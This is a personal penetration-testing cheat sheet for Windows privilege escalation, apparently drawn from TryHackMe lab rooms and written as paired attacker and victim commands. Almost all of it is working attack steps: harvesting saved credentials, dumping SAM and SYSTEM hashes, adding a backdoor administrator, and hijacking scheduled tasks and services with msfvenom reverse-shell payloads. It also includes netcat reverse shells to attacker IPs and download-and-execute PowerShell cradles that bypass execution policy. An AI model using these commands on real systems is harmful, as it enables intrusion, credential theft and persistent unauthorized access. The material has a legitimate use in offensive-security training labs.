Windows
Copy info from here: https://tryhackme.com/room/windowsprivesc20
Gathering Info
whoami /privnet usersysteminfosysteminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"dir c:\dir "c:\program files"dir "c:\program files (x86)"wmic service get name,startnamewmic service get name,pathname,startname | findstr "Program Files"Find text in file
type C:\Windows\path\to\file\$FILE | findstr $STRINGFind passwords
reg query HKLM /f password /t REG_SZ /sWhoami /priv
Harvesting Passwords from Usual Spots
Might be able to find interesting files by looking at what was recently accessed. Start -> run -> recent.
Powershell history
Examples
Harvesting Passwords from Usual Spots
Victim(cmd)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtExamples
Harvesting Passwords from Usual Spots
Need GUI to see other command prompt that will be spawned
Victim(cmd)
cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exeExamples
Harvesting Passwords from Usual Spots
Retrieve the saved password stored in the saved PuTTY session under your profile.
Victim(cmd)
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /sSee hidden files
Examples
System and Sam
Download system and sam
Examples
Tampering With Unprivileged Accounts
Kali(WinRM)
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bakDump hashes
Examples
Tampering With Unprivileged Accounts
Kali
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCALAdd User & Assign Group Memberships
Victim
net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /fEnable RDP
Victim
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fAdd user to RDP Group
Examples
Add user to group that allows them to RDP
Victim(cmd)
net localgroup "Remote Management Users" $USER /addScheduled Tasks
Examples
Windows Privilege EscalationAbusing Scheduled Tasks
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.
Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one:
Victim(cmd)
schtasks Victim(cmd)
schtasks /query /tn $TASK /fo list /v
Victim(cmd)
icacls c:\tasks\schtask.bat
Kali
nc -lvnp 4444Victim
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK Abusing Service Misconfigurations
Examples
Abusing Service Misconfigurations
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
sc qc WindowsScheduler
Victim(cmd)
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://$KALI:81/rev-svc.exe -O rev-svc.exeOnce the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.
Victim(Powershell)
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:FKali
nc -lvp 4445Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
As a result, you'll get a reverse shell with svcusr1 privileges:
Victim(cmd)
sc stop windowsscheduler
sc start windowsschedulerOR
Victim(Powershell)
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
Unquoted Service Paths
Examples
Victim(cmd)
sc qc "disk sorter enterprise"
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:FKali
nc -lvp 4446Victim(cmd)
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
Insecure Service Permissions
Examples
Victim(cmd)
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exeKali
nc -lvp 4447Victim(Powershell)
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
Abusing dangerous privileges
Examples
Kali
nc -lvp 4442Victim(Browser)
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"
Bypassing UAC
Examples:
Bypassing Applocker
Examples:
Load PowerUp.ps1 into memory.
Kali
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded
PowerUp.ps1
Invoke-AllChecksVictim(powershell)
powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1') 
Kali
echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d
Kali
xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$TPrivilege Escalation
Automated Enumeration Tools
WinPeas
Windows Exploit Suggester
SharpHound
git clone https://github.com/BloodHoundAD/BloodHound.gitPowerview
Juicy Potato
Examples
Download Juicy Potato to your attack machine
Upload Juicy Potato to the target (ex: via FTP, SMB, HTTP, etc.)
Create a reverse shell and upload it to the target (ex: via FTP, SMB, HTTP, etc.) use Juicy Potato to execute your reverse shell
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exeJuicyPotato.exe -l 5050 -p C:\path\to\reverse-shell.exe -t *PowerUp.ps1
Examples
Setup
Kali
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81Victim(cmd)
certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecksOR
Victim(powershell)
powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')Windows Exploit Suggester
Examples
Setup
Run command then paste output back to Kali in a file called systeminfo.txt
Victim
systeminfoKali
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txtWinPeas
Examples
Setup
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 82Victim
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exeSharpHound
Examples
Add this line to SharpHound.ps1 before transferring so I could run the command right away
Victim
powershell -ep bypass
.\SharpHound.ps1Kali
apt-get install bloodhound
neo4j console
bloodhound --no-sandboxFind all Domain Admins
List all Kerberostable accounts
Powerview
Examples
Victim
Run below to be able to run PowerView commands.
powershell -ep bypass
. .\Downloads\PowerView.ps1Enumerate the domain users.
Get-NetUser | select cnEnumerate the domain groups.
Get-NetGroup -GroupName *admin*Find Shared folders.
Invoke-ShareFinderGet Operating systems on the network.
Get-NetComputer -fulldata | select operatingsystemLast updated